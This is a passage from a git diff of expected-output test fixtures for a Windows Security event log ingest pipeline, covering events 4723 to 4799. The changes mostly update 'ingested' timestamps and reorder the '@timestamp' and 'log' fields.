b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4723-password-change.json-expected.json @@ -62,7 +62,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-12-09T13:45:57.198644900Z", + "ingested": "2021-12-14T14:55:50.522046350Z", "code": "4723", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -149,7 +149,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-12-09T13:45:57.198653Z", + "ingested": "2021-12-14T14:55:50.522048836Z", "code": "4723", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4724-password-reset.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4724-password-reset.json-expected.json index b7f1cf2b80f..1043c4538f6 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4724-password-reset.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4724-password-reset.json-expected.json @@ -62,7 +62,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-12-09T13:45:57.605360600Z", + "ingested": "2021-12-14T14:55:50.951897010Z", "code": "4724", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -149,7 +149,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-12-09T13:45:57.605370200Z", + "ingested": "2021-12-14T14:55:50.951899285Z", "code": "4724", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4725-account-disabled.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4725-account-disabled.json-expected.json index c26ffa0750d..efa3d79a15d 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4725-account-disabled.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4725-account-disabled.json-expected.json @@ -62,7 +62,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-12-09T13:45:58.018706300Z", + "ingested": "2021-12-14T14:55:51.363550389Z", "code": "4725", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -149,7 +149,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-12-09T13:45:58.018715100Z", + "ingested": "2021-12-14T14:55:51.363553367Z", "code": "4725", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4726-account-deleted.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4726-account-deleted.json-expected.json index bdab733d2f2..93282368c48 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4726-account-deleted.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4726-account-deleted.json-expected.json @@ -63,7 +63,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-12-09T13:45:58.420324500Z", + "ingested": "2021-12-14T14:55:51.780195367Z", "code": "4726", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -151,7 +151,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-12-09T13:45:58.420333100Z", + "ingested": "2021-12-14T14:55:51.780197953Z", "code": "4726", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4727.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4727.json-expected.json index 92adf9049a7..82436a55e5a 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4727.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4727.json-expected.json @@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2019-10-22T11:26:12.495Z", "winlog": { "computer_name": "WIN-41OB2LO92CR.wlbeat.local", "process": { @@ -44,13 +45,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4727.xml" - } - }, - "@timestamp": "2019-10-22T11:26:12.495Z", "ecs": { "version": "1.12.0" }, @@ -59,11 +53,17 @@ "WIN-41OB2LO92CR$" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4727.xml" + } + }, "host": { "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-12-09T13:45:58.829765Z", + "ingested": "2021-12-14T14:55:52.195023295Z", "code": "4727", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4728.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4728.json-expected.json index 29d7429c1ef..2222f58bfe4 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4728.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4728.json-expected.json @@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2019-10-22T11:33:26.861Z", "winlog": { "computer_name": "WIN-41OB2LO92CR.wlbeat.local", "process": { @@ -44,13 +45,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4728.xml" - } - }, - "@timestamp": "2019-10-22T11:33:26.861Z", "ecs": { "version": "1.12.0" }, @@ -59,11 +53,17 @@ "Administrator" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4728.xml" + } + }, "host": { "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-12-09T13:45:59.028797700Z", + "ingested": "2021-12-14T14:55:52.396214182Z", "code": "4728", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4729.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4729.json-expected.json index 4e789547880..c54767672bb 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4729.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4729.json-expected.json @@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2019-10-22T11:33:45.543Z", "winlog": { "computer_name": "WIN-41OB2LO92CR.wlbeat.local", "process": { @@ -44,13 +45,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4729.xml" - } - }, - "@timestamp": "2019-10-22T11:33:45.543Z", "ecs": { "version": "1.12.0" }, @@ -59,11 +53,17 @@ "Administrator" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4729.xml" + } + }, "host": { "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-12-09T13:45:59.290038500Z", + "ingested": "2021-12-14T14:55:52.655011957Z", "code": "4729", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4730.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4730.json-expected.json index 086659daf0f..1f0843e96ff 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4730.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4730.json-expected.json @@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2019-10-22T11:34:01.610Z", "winlog": { "computer_name": "WIN-41OB2LO92CR.wlbeat.local", "process": { @@ -42,13 +43,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4730.xml" - } - }, - "@timestamp": "2019-10-22T11:34:01.610Z", "ecs": { "version": "1.12.0" }, @@ -57,11 +51,17 @@ "Administrator" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4730.xml" + } + }, "host": { "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-12-09T13:45:59.545413300Z", + "ingested": "2021-12-14T14:55:52.917929313Z", "code": "4730", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4731.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4731.json-expected.json index 285251fdbc5..9e8d57cafeb 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4731.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4731.json-expected.json @@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2019-10-22T11:29:49.358Z", "winlog": { "computer_name": "WIN-41OB2LO92CR.wlbeat.local", "process": { @@ -44,13 +45,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4731.xml" - } - }, - "@timestamp": "2019-10-22T11:29:49.358Z", "ecs": { "version": "1.12.0" }, @@ -59,11 +53,17 @@ "Administrator" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4731.xml" + } + }, "host": { "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-12-09T13:45:59.740385600Z", + "ingested": "2021-12-14T14:55:53.119907336Z", "code": "4731", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4732.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4732.json-expected.json index afd3ede3ac9..cf716e2ff7b 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4732.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4732.json-expected.json @@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2019-10-22T11:31:58.039Z", "winlog": { "computer_name": "WIN-41OB2LO92CR.wlbeat.local", "process": { @@ -44,13 +45,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4732.xml" - } - }, - "@timestamp": "2019-10-22T11:31:58.039Z", "ecs": { "version": "1.12.0" }, @@ -59,11 +53,17 @@ "Administrator" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4732.xml" + } + }, "host": { "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-12-09T13:45:59.938327700Z", + "ingested": "2021-12-14T14:55:53.327527148Z", "code": "4732", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4733.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4733.json-expected.json index bd3c9c7ce45..d1625fb08b2 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4733.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4733.json-expected.json @@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2019-10-22T11:32:14.894Z", "winlog": { "computer_name": "WIN-41OB2LO92CR.wlbeat.local", "process": { @@ -44,13 +45,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4733.xml" - } - }, - "@timestamp": "2019-10-22T11:32:14.894Z", "ecs": { "version": "1.12.0" }, @@ -59,11 +53,17 @@ "Administrator" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4733.xml" + } + }, "host": { "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-12-09T13:46:00.202622100Z", + "ingested": "2021-12-14T14:55:53.590899890Z", "code": "4733", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4734.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4734.json-expected.json index c17617e0863..b175319a602 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4734.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4734.json-expected.json @@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2019-10-22T11:32:35.127Z", "winlog": { "computer_name": "WIN-41OB2LO92CR.wlbeat.local", "process": { @@ -42,13 +43,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4734.xml" - } - }, - "@timestamp": "2019-10-22T11:32:35.127Z", "ecs": { "version": "1.12.0" }, @@ -57,11 +51,17 @@ "Administrator" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4734.xml" + } + }, "host": { "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-12-09T13:46:00.463978200Z", + "ingested": "2021-12-14T14:55:53.854624754Z", "code": "4734", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4735.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4735.json-expected.json index dd81014c585..8a7a04a1e7f 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4735.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4735.json-expected.json @@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2019-10-22T11:32:30.425Z", "winlog": { "computer_name": "WIN-41OB2LO92CR.wlbeat.local", "process": { @@ -44,13 +45,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4735.xml" - } - }, - "@timestamp": "2019-10-22T11:32:30.425Z", "ecs": { "version": "1.12.0" }, @@ -59,11 +53,17 @@ "Administrator" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4735.xml" + } + }, "host": { "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-12-09T13:46:00.656014200Z", + "ingested": "2021-12-14T14:55:54.050597983Z", "code": "4735", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4737.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4737.json-expected.json index a5a85ef7dbb..0b6a375b8fc 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4737.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4737.json-expected.json @@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2019-10-22T11:33:57.271Z", "winlog": { "computer_name": "WIN-41OB2LO92CR.wlbeat.local", "process": { @@ -44,13 +45,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4737.xml" - } - }, - "@timestamp": "2019-10-22T11:33:57.271Z", "ecs": { "version": "1.12.0" }, @@ -59,11 +53,17 @@ "Administrator" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4737.xml" + } + }, "host": { "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-12-09T13:46:00.856335200Z", + "ingested": "2021-12-14T14:55:54.253800480Z", "code": "4737", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4738-account-changed.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4738-account-changed.json-expected.json index 009c5a333ee..415531dc4e4 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4738-account-changed.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4738-account-changed.json-expected.json @@ -88,7 +88,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-12-09T13:46:01.054603700Z", + "ingested": "2021-12-14T14:55:54.448206599Z", "code": "4738", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4740-account-locked-out.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4740-account-locked-out.json-expected.json index 95558c460f5..0a347a875b7 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4740-account-locked-out.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4740-account-locked-out.json-expected.json @@ -62,7 +62,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-12-09T13:46:01.309395100Z", + "ingested": "2021-12-14T14:55:54.705483833Z", "code": "4740", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4754.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4754.json-expected.json index c03c1549d86..1b675794c6e 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4754.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4754.json-expected.json @@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2019-10-22T11:34:33.783Z", "winlog": { "computer_name": "WIN-41OB2LO92CR.wlbeat.local", "process": { @@ -44,13 +45,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4754.xml" - } - }, - "@timestamp": "2019-10-22T11:34:33.783Z", "ecs": { "version": "1.12.0" }, @@ -59,11 +53,17 @@ "Administrator" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4754.xml" + } + }, "host": { "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-12-09T13:46:01.534580700Z", + "ingested": "2021-12-14T14:55:54.923831794Z", "code": "4754", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4755.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4755.json-expected.json index b105ecd48d6..cdb06c18d95 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4755.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4755.json-expected.json @@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2019-10-22T11:35:09.070Z", "winlog": { "computer_name": "WIN-41OB2LO92CR.wlbeat.local", "process": { @@ -44,13 +45,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4755.xml" - } - }, - "@timestamp": "2019-10-22T11:35:09.070Z", "ecs": { "version": "1.12.0" }, @@ -59,11 +53,17 @@ "Administrator" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4755.xml" + } + }, "host": { "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-12-09T13:46:01.729553600Z", + "ingested": "2021-12-14T14:55:55.130838375Z", "code": "4755", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4756.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4756.json-expected.json index 923556d58fd..526ca907587 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4756.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4756.json-expected.json @@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2019-10-22T11:34:58.413Z", "winlog": { "computer_name": "WIN-41OB2LO92CR.wlbeat.local", "process": { @@ -44,13 +45,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4756.xml" - } - }, - "@timestamp": "2019-10-22T11:34:58.413Z", "ecs": { "version": "1.12.0" }, @@ -59,11 +53,17 @@ "Administrator" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4756.xml" + } + }, "host": { "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-12-09T13:46:01.936912200Z", + "ingested": "2021-12-14T14:55:55.330320969Z", "code": "4756", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4757.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4757.json-expected.json index 9e51f4f2ef9..e0c13e8e22a 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4757.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4757.json-expected.json @@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2019-10-22T11:35:09.070Z", "winlog": { "computer_name": "WIN-41OB2LO92CR.wlbeat.local", "process": { @@ -44,13 +45,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4757.xml" - } - }, - "@timestamp": "2019-10-22T11:35:09.070Z", "ecs": { "version": "1.12.0" }, @@ -59,11 +53,17 @@ "Administrator" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4757.xml" + } + }, "host": { "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-12-09T13:46:02.212799Z", + "ingested": "2021-12-14T14:55:55.593178552Z", "code": "4757", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4758.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4758.json-expected.json index 629aa9d4fd9..5d05f834a79 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4758.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4758.json-expected.json @@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2019-10-22T11:35:13.550Z", "winlog": { "computer_name": "WIN-41OB2LO92CR.wlbeat.local", "process": { @@ -42,13 +43,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4758.xml" - } - }, - "@timestamp": "2019-10-22T11:35:13.550Z", "ecs": { "version": "1.12.0" }, @@ -57,11 +51,17 @@ "Administrator" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4758.xml" + } + }, "host": { "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-12-09T13:46:02.470400500Z", + "ingested": "2021-12-14T14:55:55.858879473Z", "code": "4758", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4764.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4764.json-expected.json index d880de8ee79..e5854b3b265 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4764.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4764.json-expected.json @@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2019-10-22T11:33:57.271Z", "winlog": { "computer_name": "WIN-41OB2LO92CR.wlbeat.local", "process": { @@ -43,13 +44,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4764.xml" - } - }, - "@timestamp": "2019-10-22T11:33:57.271Z", "ecs": { "version": "1.12.0" }, @@ -58,11 +52,17 @@ "Administrator" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4764.xml" + } + }, "host": { "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-12-09T13:46:02.674299700Z", + "ingested": "2021-12-14T14:55:56.053719148Z", "code": "4764", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4767-account-unlocked.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4767-account-unlocked.json-expected.json index 70030989636..64878967762 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4767-account-unlocked.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4767-account-unlocked.json-expected.json @@ -62,7 +62,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-12-09T13:46:02.863165Z", + "ingested": "2021-12-14T14:55:56.254945951Z", "code": "4767", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4781-account-renamed.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4781-account-renamed.json-expected.json index d36f2e08438..9ee07f78aff 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4781-account-renamed.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4781-account-renamed.json-expected.json @@ -65,7 +65,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-12-09T13:46:03.085219100Z", + "ingested": "2021-12-14T14:55:56.478572199Z", "code": "4781", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -156,7 +156,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-12-09T13:46:03.085223200Z", + "ingested": "2021-12-14T14:55:56.478575082Z", "code": "4781", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4798.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4798.json-expected.json index ed2647237a8..1d19d8b9b10 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4798.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4798.json-expected.json @@ -64,7 +64,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-12-09T13:46:03.473678500Z", + "ingested": "2021-12-14T14:55:56.871480572Z", "code": "4798", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4799.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4799.json-expected.json index 684f24c0a0b..5c1bb72ace2 100644 --- 